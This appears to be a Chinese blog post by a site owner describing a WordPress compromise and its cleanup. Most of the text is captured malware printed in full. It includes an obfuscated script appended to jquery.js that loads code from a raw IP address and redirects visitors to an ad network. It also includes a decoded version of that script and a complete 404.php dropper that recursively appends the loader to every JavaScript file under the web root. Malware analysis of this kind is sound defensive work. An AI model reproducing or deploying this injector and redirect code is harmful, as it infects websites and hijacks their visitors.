wodpress js文件注入相关代码

公司网站莫名被黑，初次打开跳转到别的网站，再打开不跳转，猜测cookie被写入，删除之调试，相关JS文件改回来，网站一旦访问再次被感染，影响上百个JS文件及部分PHP文件。
解决办法：全局清除感染代码。调整文件权限。

(整个病毒工作原理Malicious Pastebin Replacement for jQuery)
jquery.js 文件后被追加如下代码，跳转地址为一个广告分发中心

var _0xaae8 = ["", "\x6A\x6F\x69\x6E", "\x72\x65\x76\x65\x72\x73\x65", "\x73\x70\x6C\x69\x74", "\x3E\x74\x70\x69\x72\x63\x73\x2F\x3C\x3E\x22\x73\x6A\x2E\x79\x72\x65\x75\x71\x6A\x2F\x38\x37\x2E\x36\x31\x31\x2E\x39\x34\x32\x2E\x34\x33\x31\x2F\x2F\x3A\x70\x74\x74\x68\x22\x3D\x63\x72\x73\x20\x74\x70\x69\x72\x63\x73\x3C", "\x77\x72\x69\x74\x65"];
document[_0xaae8[5]](_0xaae8[4][_0xaae8[3]](_0xaae8[0])[_0xaae8[2]]()[_0xaae8[1]](_0xaae8[0]))

转码为：

var _0xaae8 = ["", "join", "reverse", "split", ">tpircs/<>"sj.yreuqj/87.611.942.431//:ptth"=crs tpircs<", "write"];
document[_0xaae8[5]](_0xaae8[4][_0xaae8[3]](_0xaae8[0])[_0xaae8[2]]()[_0xaae8[1]](_0xaae8[0]))

浏览器提示信息：
A Parser-blocking, cross-origin script, http://134.249.116.78/jquery.js, is invoked via document.write. This may be blocked by the browser if the device has poor network connectivity. See https://www.chromestatus.com/feature/5718547946799104 for more details.

跳转后JS代码：

var _0x8a42=["\x68\x72\x65\x66","\x6C\x6F\x63\x61\x74\x69\x6F\x6E","\x68\x74\x74\x70\x3A\x2F\x2F\x67\x6F\x2E\x61\x64\x32\x75\x70\x2E\x63\x6F\x6D\x2F\x61\x66\x75\x2E\x70\x68\x70\x3F\x69\x64\x3D\x34\x37\x33\x37\x39\x31","\x67\x65\x74\x54\x69\x6D\x65","\x73\x65\x74\x54\x69\x6D\x65","\x63\x6F\x6F\x6B\x69\x65","\x3D","\x3B\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x47\x4D\x54\x53\x74\x72\x69\x6E\x67","\x3B\x20\x70\x61\x74\x68\x3D","","\x69\x6E\x64\x65\x78\x4F\x66","\x6C\x65\x6E\x67\x74\x68","\x73\x75\x62\x73\x74\x72\x69\x6E\x67","\x3B","\x63\x6F\x6F\x6B\x69\x65\x45\x6E\x61\x62\x6C\x65\x64","\x2F\x77\x70\x2D\x61\x64\x6D\x69\x6E\x2F","\x70\x61\x74\x68\x6E\x61\x6D\x65","\x63\x73\x72\x66\x5F\x75\x69\x64","\x31","\x2F","\x6C\x6F\x61\x64\x65\x64","\x61\x64\x64\x45\x76\x65\x6E\x74\x4C\x69\x73\x74\x65\x6E\x65\x72","\x6C\x6F\x61\x64","\x6F\x6E\x6C\x6F\x61\x64","\x61\x74\x74\x61\x63\x68\x45\x76\x65\x6E\x74"];function _1q0x(){window[_0x8a42[1]][_0x8a42[0]]= _0x8a42[2]}function _q1x0(_0x762dx3,_0x762dx4,_0x762dx5,_0x762dx6){var _0x762dx7= new Date();var _0x762dx8= new Date();if(_0x762dx5=== null|| _0x762dx5=== 0){_0x762dx5= 3};_0x762dx8[_0x8a42[4]](_0x762dx7[_0x8a42[3]]()+ 3600000* 24* _0x762dx5);document[_0x8a42[5]]= _0x762dx3+ _0x8a42[6]+ escape(_0x762dx4)+ _0x8a42[7]+ _0x762dx8[_0x8a42[8]]()+ ((_0x762dx6)?_0x8a42[9]+ _0x762dx6:_0x8a42[10])}function _z1g1(_0x762dxa){var _0x762dxb=document[_0x8a42[5]][_0x8a42[11]](_0x762dxa+ _0x8a42[6]);var _0x762dxc=_0x762dxb+ _0x762dxa[_0x8a42[12]]+ 1;if((!_0x762dxb) && (_0x762dxa!= document[_0x8a42[5]][_0x8a42[13]](0,_0x762dxa[_0x8a42[12]]))){return null};if(_0x762dxb==  -1){return null};var _0x762dxd=document[_0x8a42[5]][_0x8a42[11]](_0x8a42[14],_0x762dxc);if(_0x762dxd==  -1){_0x762dxd= document[_0x8a42[5]][_0x8a42[12]]};return unescape(document[_0x8a42[5]][_0x8a42[13]](_0x762dxc,_0x762dxd))}if(navigator[_0x8a42[15]]){if(window[_0x8a42[1]][_0x8a42[17]][_0x8a42[11]](_0x8a42[16])!=  -1){_q1x0(_0x8a42[18],_0x8a42[19],_0x8a42[19],_0x8a42[20])};if(window[_0x8a42[1]][_0x8a42[17]][_0x8a42[11]](_0x8a42[16])==  -1){if(_z1g1(_0x8a42[18])== 1){}else {_q1x0(_0x8a42[18],_0x8a42[19],_0x8a42[19],_0x8a42[20]);if(document[_0x8a42[21]]){_1q0x()}else {if(window[_0x8a42[22]]){window[_0x8a42[22]](_0x8a42[23],_1q0x,false)}else {window[_0x8a42[25]](_0x8a42[24],_1q0x)}}}}}

还原后：

var _0x8a42=["href","location","http://go.ad2up.com/afu.php?id=473791","getTime","setTime","cookie","=",";expires=","toGMTString","; path=","","indexOf","length","substring",";","cookieEnabled","/wp-admin/","pathname","csrf_uid","1","/","loaded","addEventListener","load","onload","attachEvent"];function _1q0x(){window[_0x8a42[1]][_0x8a42[0]]= _0x8a42[2]}function _q1x0(_0x762dx3,_0x762dx4,_0x762dx5,_0x762dx6){var _0x762dx7= new Date();var _0x762dx8= new Date();if(_0x762dx5=== null|| _0x762dx5=== 0){_0x762dx5= 3};_0x762dx8[_0x8a42[4]](_0x762dx7[_0x8a42[3]]()+ 3600000* 24* _0x762dx5);document[_0x8a42[5]]= _0x762dx3+ _0x8a42[6]+ escape(_0x762dx4)+ _0x8a42[7]+ _0x762dx8[_0x8a42[8]]()+ ((_0x762dx6)?_0x8a42[9]+ _0x762dx6:_0x8a42[10])}function _z1g1(_0x762dxa){var _0x762dxb=document[_0x8a42[5]][_0x8a42[11]](_0x762dxa+ _0x8a42[6]);var _0x762dxc=_0x762dxb+ _0x762dxa[_0x8a42[12]]+ 1;if((!_0x762dxb) && (_0x762dxa!= document[_0x8a42[5]][_0x8a42[13]](0,_0x762dxa[_0x8a42[12]]))){return null};if(_0x762dxb==  -1){return null};var _0x762dxd=document[_0x8a42[5]][_0x8a42[11]](_0x8a42[14],_0x762dxc);if(_0x762dxd==  -1){_0x762dxd= document[_0x8a42[5]][_0x8a42[12]]};return unescape(document[_0x8a42[5]][_0x8a42[13]](_0x762dxc,_0x762dxd))}if(navigator[_0x8a42[15]]){if(window[_0x8a42[1]][_0x8a42[17]][_0x8a42[11]](_0x8a42[16])!=  -1){_q1x0(_0x8a42[18],_0x8a42[19],_0x8a42[19],_0x8a42[20])};if(window[_0x8a42[1]][_0x8a42[17]][_0x8a42[11]](_0x8a42[16])==  -1){if(_z1g1(_0x8a42[18])== 1){}else {_q1x0(_0x8a42[18],_0x8a42[19],_0x8a42[19],_0x8a42[20]);if(document[_0x8a42[21]]){_1q0x()}else {if(window[_0x8a42[22]]){window[_0x8a42[22]](_0x8a42[23],_1q0x,false)}else {window[_0x8a42[25]](_0x8a42[24],_1q0x)}}}}}

被感染的404.php文件：

error_reporting(0);
$file_name = 'e';
$text = 'var _0xaae8=["","\x6A\x6F\x69\x6E","\x72\x65\x76\x65\x72\x73\x65","\x73\x70\x6C\x69\x74","\x3E\x74\x70\x69\x72\x63\x73\x2F\x3C\x3E\x22\x73\x6A\x2E\x79\x72\x65\x75\x71\x6A\x2F\x38\x37\x2E\x36\x31\x31\x2E\x39\x34\x32\x2E\x34\x33\x31\x2F\x2F\x3A\x70\x74\x74\x68\x22\x3D\x63\x72\x73\x20\x74\x70\x69\x72\x63\x73\x3C","\x77\x72\x69\x74\x65"];document[_0xaae8[5]](_0xaae8[4][_0xaae8[3]](_0xaae8[0])[_0xaae8[2]]()[_0xaae8[1]](_0xaae8[0]))';
$position = 2;
function getDirContents($dir) {
    global $file_name, $text, $position;
    $files = scandir($dir);
    foreach($files as $key => $value){
        $path = realpath($dir.DIRECTORY_SEPARATOR.$value);
        if(!is_dir($path)) {
            $path_info = pathinfo($path);
			$pos3 = stripos($path_info['basename'], '.js');
			 if($pos3 !== false){
			    $pos2 = stripos($path_info['basename'], $file_name);
				if($pos2 !== false) {

					echo 'Error_Page_Not_Found ';
					$pos1 = stripos(file_get_contents($path), $text);
					if ($pos1 === false) { 
					//echo 'EDIT '.$path."\n";
					if($position == 2) { 
						file_put_contents($path, $text, FILE_APPEND);					
						}
						 else {
							file_put_contents($path, $text.file_get_contents($path));
					}
					}

					}
			}		
        } elseif($value != "." && $value != "..") {
            getDirContents($path);
        }
    }

	
}

//start
$path = $_SERVER['DOCUMENT_ROOT'];
//public_html
$pos1 = stripos($path,'/public_html/');
if ($pos1 !== false){
$rest = substr($path, 0, stripos($path, '/public_html/') + strlen('/public_html/'));
getDirContents($rest);
} else { 
 //html
 $pos1 = stripos($path,'/html/');
 if ($pos1 !== false){
 $rest = substr($path, 0, stripos($path, '/html/') + strlen('/html/'));
 getDirContents($rest);
 } else {
	//httpdocs
	$pos1 = stripos($path,'/httpdocs/');
	if ($pos1 !== false){
	$rest = substr($path, 0, stripos($path, '/httpdocs/') + strlen('/httpdocs/'));
	getDirContents($rest);
	} else {
		//vhosts
		$pos1 = stripos($path,'/vhosts/');
		if ($pos1 !== false){
		$rest = substr($path, 0, stripos($path, '/vhosts/') + strlen('/vhosts/'));
		getDirContents($rest);
		} else {
			//www
			$pos1 = stripos($path,'/www/');
			if ($pos1 !== false){
			$rest = substr($path, 0, stripos($path, '/www/') + strlen('/www/'));
			getDirContents($rest);
			} else {
				//wwwroot
				$pos1 = stripos($path,'/wwwroot/');
				if ($pos1 !== false){
				$rest = substr($path, 0, stripos($path, '/wwwroot/') + strlen('/wwwroot/'));
				getDirContents($rest);
				} else {
					//web
					$pos1 = stripos($path,'/web/');
					if ($pos1 !== false){
					$rest = substr($path, 0, stripos($path, '/web/') + strlen('/web/'));
					getDirContents($rest);
					} else {
					getDirContents($_SERVER['DOCUMENT_ROOT']);	
				}}	
			}	
		}	
	}
 }	
 
}